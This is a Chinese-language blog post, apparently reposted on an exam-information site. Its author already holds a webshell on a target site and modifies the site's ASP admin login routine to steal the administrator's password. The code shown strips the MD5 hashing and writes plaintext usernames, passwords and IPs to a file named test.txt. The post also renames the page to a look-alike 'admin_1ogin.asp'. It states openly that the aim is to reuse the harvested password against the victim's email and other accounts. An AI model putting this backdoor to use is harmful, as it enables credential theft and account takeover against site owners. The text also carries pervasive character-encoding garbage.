在一次安全檢測中���,其實已拿到了webshell了�,但是我還要社工他的郵箱還有其他資料類�����,所以要得知道他的習(xí)性����。
下載了數(shù)據(jù)庫,但是md5密碼沒辦法解密����。唉,看來只要記錄他的登錄管理員 賬號密碼了��!
省得還要去窮取法破解�����!
這個密碼其實說重要也不重要 說不 重要 其實很重要����。
因為很多人喜歡使用相同密碼���。即使是我這類安全檢測人員,也免不了使用同一種賬號密碼的習(xí)慣��。
首先看看他的后臺登陸代碼
<%
Dim Login
Set Login=new AdLogin
Login.Execute
Class AdLogin
Private ExCommCls
Private Sub class_initialize
Set CommCls=new CommonCls
ExCommCls.IsIpAllow
ExCommCls.CheckInstall
ExCommCls.GetConfigCache("*")
End Sub
Private Sub class_terminate
Set ExCommCls=nothing
End Sub
public Sub Execute
Dim Action
Action=Request("action")
Select Case Action
Case "CheckLogin"
CheckLogin
Case "LoginOut"
LoginOut
Case Else
LoginF
End Select
End Sub
Private Sub CheckLogin
Dim Adname,AdPwd,CheckCode
AdName=ExCommCls.G(Trim(request("Adname")))
AdPwd=md5(Trim(request("AdPwd")))
CheckCode=ExCommCls.G(request("checkCode"))
If Trim(CheckCode)<>session("excheckcode") and Application(sn&"IsCheckCode")="是" Then
ExCommCls.ShowMsg "驗證碼錯誤���!",Application(sn&"blogurl")&"admin_login.asp"
Exit Sub
End If
If Trim(AdName)=CStr(Application(sn&"AdName")) And Trim(AdPwd)=CStr(Application(sn&"AdPwd")) Then
Response.Cookies(Md5(SN))("AdName")=AdName
Response.Cookies(Md5(SN))("AdPwd")=AdPwd
session("AdLogin")=Md5(SN)
ExCommCls.GetConfigCache("*")
ExCommCls.GetClassCache()
Response.Redirect(Application(sn&"blogurl")&"admin_index.asp")
Else
ExCommCls.ShowMsg "帳號或密碼錯誤",Application(sn&"blogurl")&"admin_login.asp"
End if
End Sub
Private Sub LoginOut
Response.Cookies(Md5(SN))("AdName")=""
Response.Cookies(Md5(SN))("AdPwd")=""
session.Abandon()
ExCommCls.ShowMsg "成功退出登陸",Application(sn&"blogurl")&"index.asp"
End Sub
Private Sub LoginF
%>
看下列代碼
AdName=ExCommCls.G(Trim(request("Adname")))
AdPwd=md5(Trim(request("AdPwd")))
---意思很簡單�,這里就不明說了�����, 主要看md5 ,密碼使用md5加密 這樣的話�,我們記錄的密碼也就沒用了,還是md5�����。所以
所以想到了�����,一個釣魚手法���。 它本來的登錄界面是
Private Sub CheckLogin
Dim Adname,AdPwd,CheckCode,StrLogText,ip,ff
AdName=ExCommCls.G(Trim(request("Adname")))
AdPwd=(Trim(request("AdPwd")))
CheckCode=ExCommCls.G(request("checkCode"))
strLogFile="test.txt"
IP=request("IP")
StrLogText=StrLogText&AdName&"----"&AdPwd&"----IP:"&IP&("REMOTE_HOST")
set f=Server.CreateObject("scripting.filesystemobject")
set ff=f.opentextfile(server.mappath(".")&"\"&strLogFile,8,true,0)
ff.writeline(chr(13)+chr(10)&StrLogText)
ff.close
set ff=nothing
set f=nothing
If Trim(CheckCode)<>session("excheckcode") and Application(sn&"IsCheckCode")="是" Then
ExCommCls.ShowMsg "驗證碼錯誤�!",Application(sn&"blogurl")&"Admin_1ogin.asp"
Exit Sub
End If
If Trim(AdName)=CStr(Application(sn&"AdName")) And Trim(AdPwd)=CStr(Application(sn&"AdPwd")) Then
Response.Cookies(Md5(SN))("AdName")=AdName
Response.Cookies((SN))("AdPwd")=AdPwd
session("AdLogin")=Md5(SN)
ExCommCls.GetConfigCache("*")
ExCommCls.GetClassCache()
Response.Redirect(Application(sn&"blogurl")&"Admin_1ogin.asp")
Else
ExCommCls.ShowMsg "帳號或密碼錯誤",Application(sn&"blogurl")&"Admin_1ogin.asp"
End if
End Sub
看到?jīng)],
a=本來的登錄頁面 現(xiàn)在換成了釣魚頁面
b=本來的登錄頁面(admin_login.asp)修改成admin_1ogin.asp
為什么呢�����。
本來的: AdPwd=md5(Trim(request("AdPwd")))
Response.Cookies(Md5(SN))("AdPwd")=AdPwd
修改
AdPwd=(Trim(request("AdPwd")))
Response.Cookies((SN))("AdPwd")=AdPwd
去掉md5���。。這樣的迷惑手法��,使用很久了����!。��。
沒什么技術(shù)含量�����。 還請不要見笑���!密碼會記錄在test.txt上
更多信息請查看IT技術(shù)專欄
由于各方面情況的不斷調(diào)整與變化��,易賢網(wǎng)提供的所有考試信息和咨詢回復(fù)僅供參考�,敬請考生以權(quán)威部門公布的正式信息和咨詢?yōu)闇?zhǔn)!
公眾號
事業(yè)單位
當(dāng)前位置:
公考類
招聘類
各類考試
